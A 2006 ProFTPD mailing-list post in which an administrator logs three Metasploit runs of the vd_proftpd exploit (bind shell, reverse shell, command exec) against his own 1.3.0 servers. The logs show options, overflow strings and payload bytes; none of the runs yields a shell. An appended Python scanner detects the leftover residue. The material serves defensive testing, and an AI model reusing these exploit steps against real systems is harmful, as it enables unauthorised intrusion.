
On Sun, 26 Nov 2006, Zube wrote:

-> > Does this entire threat depend on the use of the
-> > CommandBufferSize directive,
-> > which would have to be manually added to any sample starting
-> > configuration?

-> It appears the answer is no. This posting:
->
-> http://archives.neohapsis.com/archiv...6-q4/0224.html
->
-> suggests that the 0-day has nothing to do with the CommandBufferSize
-> directive.

As vd_proftpd.pm is posted around several places now, I got ahold of it and
wanted to see what would happen in an actual attack. Here are several real tries
using vd_proftpd.pm on Metasploit:

Try #1:
-------

From-source compiled, libssp add-on, 1.3.0 on LAN, writable directory (all
tries have a writable directory); the exploit seems to work but gives no shell
(exits quickly):

Exploit and Payload Options
===========================

  Exploit:    Name    Default         Description
  --------    ------  -------------   -------------------
  required    PASS    ftp123          Password
  required    RHOST   192.168.10.76   The target address
  optional    DIR     /vdrl-upload    Writeable directory
  required    RPORT   21              The target port
  required    USER    anonymous       Username

  Payload:    Name    Default  Description
  --------    ------  -------  -----------------------------
  required    LPORT   4444     Listening port for bind shell

  Target: ProFTPD 1.3.0 (source install) / Debian 3.1

msf vd_proftpd(linux_ia32_bind) > exploit
[*] Starting Bind Handler.
Banner: 220-220- ###### ####### ####### ######220- #
# ##### #### # # # #220- # # # # # # #
# # #220- ###### # # # # ##### # ######220- #
##### # # # # #220- # # # # # # #
#220- # # # #### # # # d220-220-
ATr2 RG 2006 FTP Server @ VDRL220- 220-
220- _@gE@##Emh_ 220- _g@*"_F
*@ 220- _@*__g#~ @ {220- @@*"
# ' 220- _#@ ]! ," 220-
t { _-" 220- . ~ 220-
220 ProFTPD 1.3.0 Server (FTP [ATr2 RG 2006] At VDRL) [192.168.10.76]
USER response: 331 Anonymous login ok, send your complete email address as
your password.
PASS response: 230 Request accepted, continue.
CWD response:
250-250-250-%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%250-250-[Uploadable
Directory] This area is250-for the upload of user's files. The250-directory
allows read/write to be250-able to view & verify your
own250-upload.250-250-It would also be a good idea to send250-an email to
ftpadmin vdrl.ath.cx to250-make sure your file gets attented
to.250-250-%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%250- 250 CWD command
successful
Current directory: /vdrl-upload/
Dir1 length is 238 bytes
MKD response: 257
"/vdrl-upload/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
- Directory successfully created
CWD response: 250 CWD command successful
PWD response: 257
"/vdrl-upload/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
is current directory.
Dir2 length is 100 bytes
MKD response: 257
"/vdrl-upload/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB=C8=F4Y
=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC" - Directory successfully created
PASV response: 227 Entering Passive Mode (192,168,10,76,13,116).
Opening connection to 192.168.10.76:3444
STOR response: 150 Opening BINARY mode data connection for
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB=C8=F4Y

=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC/.message
FILE transfered: 226 Transfer complete.
[*] Exiting Bind Handler.


It mangles my ascii banner, but no shell...

Try #2
------

From-source compile, libssp add-on, 1.3.0, new payload, inet to LAN,
writable directory & anonymous:


msf vd_proftpd(linux_ia32_reverse) > show options

Exploit and Payload Options
===========================

  Exploit:    Name    Default        Description
  --------    ------  ------------   -------------------
  required    PASS    ftp123         Password
  required    RHOST   69.95.5.114    The target address
  optional    DIR     /atr2-upload   Writeable directory
  required    RPORT   21             The target port
  required    USER    anonymous      Username

  Payload:    Name    Default         Description
  --------    ------  -------------   -----------------------------------
  required    LHOST   192.168.10.75   Local address to receive connection
  required    LPORT   4321            Local port to receive connection

  Target: ProFTPD 1.3.0 (source install) / Debian 3.1

msf vd_proftpd(linux_ia32_reverse) > exploit
[*] Starting Reverse Handler.
Banner: 220-######--------------------------------------------------+220-#/
/#/ #####/ #### [ATr2 RG] FTP Server @ ATr2 |220-#//// #/ #/ # #/
# |220-######/ #/// # #/ #
------------------------------+220-#/ #####/ #/ # Tue Nov 28
04:26:38 2006 220-#/ #/ #/ #/// # 68638832 free.
ftpadmin atr2.ath.cx220-#/ #/ # #### FTPD
220-------------------------_@gE@##Emh_ 220-
_g@*"_F *@ 220- _@*__g#~ @ {220-
@@*" # ' 220- _#@ ]! ," 220-
t { _-" 220- . ~220- Graced
By A Distro-Free Linux.///////////////// 220-
/////////////////////////////Powered By Proftpd. 220-
------------------------------------------------ 220- This is the
ATr2 RG FTP Server @ Atr2. All 220- connections are logged. Please use
a valid email 220- address for anonymous access (NOT
@microsoft.com,220- @example.com, leech, @nowhere.org, or leech@).220-
220- NO WEB BROWSERS, please, they make a mess of ftp. 220- 220-
Indexing, mirroring, web bots/recursive downloads220- forbidden: you
will be banned quickly. Those who220- are associated with, in ANY way:
RIAA, Microsoft,220- antivirus firm without express prior
permission,220- or any governmental, local, national, private, or 220-
international law enforcement agency or 220- investigations
firm/agency:220- Access is PROHIBITED: Private Server/Property.220-
------------------------------------------------220-
220 ProFTPD 1.3.0 Server (FTP [ATr2 RG 2006] Server) [69.95.5.114]
USER response: 331 Anonymous login ok, send your complete email address as
your password.
PASS response: 230 OK: hop to it.
CWD response: 250-250-250- ======================================250-
[UpLoadable Area] Incoming files can250- be placed in this directory. To
get250- them attention (faster), you can 250- send a brief notice to the FTP
Admin250- at 250-
ftpadmin atr2.ath.cx250-=======================================250- 250 CWD
command successful
Current directory: /atr2-upload/
Dir1 length is 238 bytes
MKD response: 257
"/atr2-upload/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
- Directory successfully created
CWD response: 250 CWD command successful
PWD response: 257
"/atr2-upload/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
is current directory.
Dir2 length is 100 bytes
MKD response: 257
"/atr2-upload/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB=C8=F4Y
=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC" - Directory successfully created
PASV response: 227 Entering Passive Mode (69,95,5,114,11,234).
Opening connection to 69.95.5.114:3050
STOR response: 150 Opening BINARY mode data connection for
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB=C8=F4Y

=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC/.message
FILE transfered: 226 Transfer complete.
[*] Exiting Reverse Handler.

msf vd_proftpd(linux_ia32_reverse) >


No shell, same as before, this left in writable directory:

ls /home/ftp/atr2-upload/
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/
auto-gzip/
README



Try #3:
---------

Same server, using exec payload (uname -a, with full path)


msf vd_proftpd(linux_ia32_exec) > show options

Exploit and Payload Options
===========================

  Exploit:    Name    Default        Description
  --------    ------  ------------   -------------------
  required    PASS    ftp123         Password
  required    RHOST   69.95.5.114    The target address
  optional    DIR     /atr2-upload   Writeable directory
  required    RPORT   21             The target port
  required    USER    anonymous      Username

  Payload:    Name    Default    Description
  --------    ------  --------   -----------------------------
  required    CMD     uname -a   The command string to execute

  Target: ProFTPD 1.3.0 (source install) / Debian 3.1

msf vd_proftpd(linux_ia32_exec) > which uname
/bin/uname
msf vd_proftpd(linux_ia32_exec) > set CMD "/bin/uname -a"
CMD -> /bin/uname -a
msf vd_proftpd(linux_ia32_exec) > exploit
Banner: 220-######--------------------------------------------------+220-#/
/#/ #####/ #### [ATr2 RG] FTP Server @ ATr2 |220-#//// #/ #/ # #/
# |220-######/ #/// # #/ #
------------------------------+220-#/ #####/ #/ # Tue Nov 28
04:33:04 2006 220-#/ #/ #/ #/// # 68638832 free.
ftpadmin atr2.ath.cx220-#/ #/ # #### FTPD
220-------------------------_@gE@##Emh_ 220-
_g@*"_F *@ 220- _@*__g#~ @ {220-
@@*" # ' 220- _#@ ]! ," 220-
t { _-" 220- . ~220- Graced
By A Distro-Free Linux.///////////////// 220-
/////////////////////////////Powered By Proftpd. 220-
------------------------------------------------ 220- This is the
ATr2 RG FTP Server @ Atr2. All 220- connections are logged. Please use
a valid email 220- address for anonymous access (NOT
@microsoft.com,220- @example.com, leech, @nowhere.org, or leech@).220-
220- NO WEB BROWSERS, please, they make a mess of ftp. 220- 220-
Indexing, mirroring, web bots/recursive downloads220- forbidden: you
will be banned quickly. Those who220- are associated with, in ANY way:
RIAA, Microsoft,220- antivirus firm without express prior
permission,220- or any governmental, local, national, private, or 220-
international law enforcement agency or 220- investigations
firm/agency:220- Access is PROHIBITED: Private Server/Property.220-
------------------------------------------------220-
220 ProFTPD 1.3.0 Server (FTP [ATr2 RG 2006] Server) [69.95.5.114]
USER response: 331 Anonymous login ok, send your complete email address as
your password.
PASS response: 230 OK: hop to it.
CWD response: 250-250-250- ======================================250-
[UpLoadable Area] Incoming files can250- be placed in this directory. To
get250- them attention (faster), you can 250- send a brief notice to the FTP
Admin250- at 250-
ftpadmin atr2.ath.cx250-=======================================250- 250 CWD
command successful
Current directory: /atr2-upload/
Dir1 length is 238 bytes
MKD response: 550
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: File exists
CWD response: 250 CWD command successful
PWD response: 257
"/atr2-upload/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
is current directory.
Dir2 length is 100 bytes
MKD response: 257
"/atr2-upload/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB=C8=F4Y
=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC" - Directory successfully created
PASV response: 227 Entering Passive Mode (69,95,5,114,18,15).
Opening connection to 69.95.5.114:4623
STOR response: 150 Opening BINARY mode data connection for
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB=C8=F4Y

=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC=CC/.message
FILE transfered: 226 Transfer complete.
msf vd_proftpd(linux_ia32_exec) >

A lot of sizzle, but no bang again. Conclusion: it may work in some situations,
but it doesn't seem to work here. It seems very close, too close for comfort.
Perhaps an address that the exploit relies on is different in my binary?

root@atr2 local/bin # rc.proftpd stop
+ Proftpd server terminated

...while I compile a new one.

-> Sad to say but I'm moving over to vsftpd, at least for the time being.

I'll give out a shell before I use that


-- 
Linux 2.6.18.2 on Pentium II (Klamath) up 69.33
Linux 2.6.18.2 on Intel(R) Pentium(R) 4 CPU 2.80GHz up 20.03
Minix 2.0.4 (currently offline)
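The three tries above all leave the same residue on the server even when no shell comes back: a directory named with 238 repeated bytes, a second one of filler plus raw bytes, and a `.message` file whose content is non-printable. The check below is an added example, not code from the post or from ProFTPD; it walks an anonymous-writable upload tree and flags that pattern. The thresholds and the constructed sample tree are assumptions.

```python
import os
import tempfile

# Thresholds are our assumption; the post's traces show MKD names of 238 and 100
# bytes of one repeated character, then a STOR of ".message" holding raw bytes.
FILLER_MIN_LEN = 64
FILLER_RATIO = 0.6
MESSAGE_FILE = ".message"


def looks_like_filler(name: str) -> bool:
    """True for long names dominated by one repeated character (e.g. 238 x 'A')."""
    if len(name) < FILLER_MIN_LEN:
        return False
    return max(name.count(c) for c in set(name)) / len(name) >= FILLER_RATIO


def has_binary_content(path: str, limit: int = 4096) -> bool:
    """True if the first bytes hold anything outside printable ASCII and whitespace."""
    with open(path, "rb") as fh:
        data = fh.read(limit)
    return any(b < 0x09 or 0x0E <= b < 0x20 or b >= 0x7F for b in data)


def find_residue(root: str) -> list:
    """Walk an anonymous-writable upload tree; return (kind, path) findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            if looks_like_filler(d):
                findings.append(("filler-directory", os.path.join(dirpath, d)))
        for f in filenames:
            path = os.path.join(dirpath, f)
            if f == MESSAGE_FILE and has_binary_content(path):
                findings.append(("binary-message-file", path))
    return findings


def build_sample_tree() -> str:
    """Constructed sample: the post's 'ls' listing plus the nested dir and upload."""
    root = tempfile.mkdtemp(prefix="atr2-upload-")
    os.makedirs(os.path.join(root, "auto-gzip"))
    with open(os.path.join(root, "README"), "w") as fh:
        fh.write("Upload area; mail the FTP admin about your file.\n")
    nested = os.path.join(root, "A" * 238, "B" * 64 + "Y")  # second dir kept ASCII
    os.makedirs(nested)
    with open(os.path.join(nested, MESSAGE_FILE), "wb") as fh:
        fh.write(b"B" * 64 + b"\xc8\xf4Y" + b"\xcc" * 28)  # bytes as in the STOR line
    return root
```

Run `find_residue()` over the real upload root (for the post's server, /home/ftp/atr2-upload/) to get a list of paths to review and remove.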
ProFTPD Users List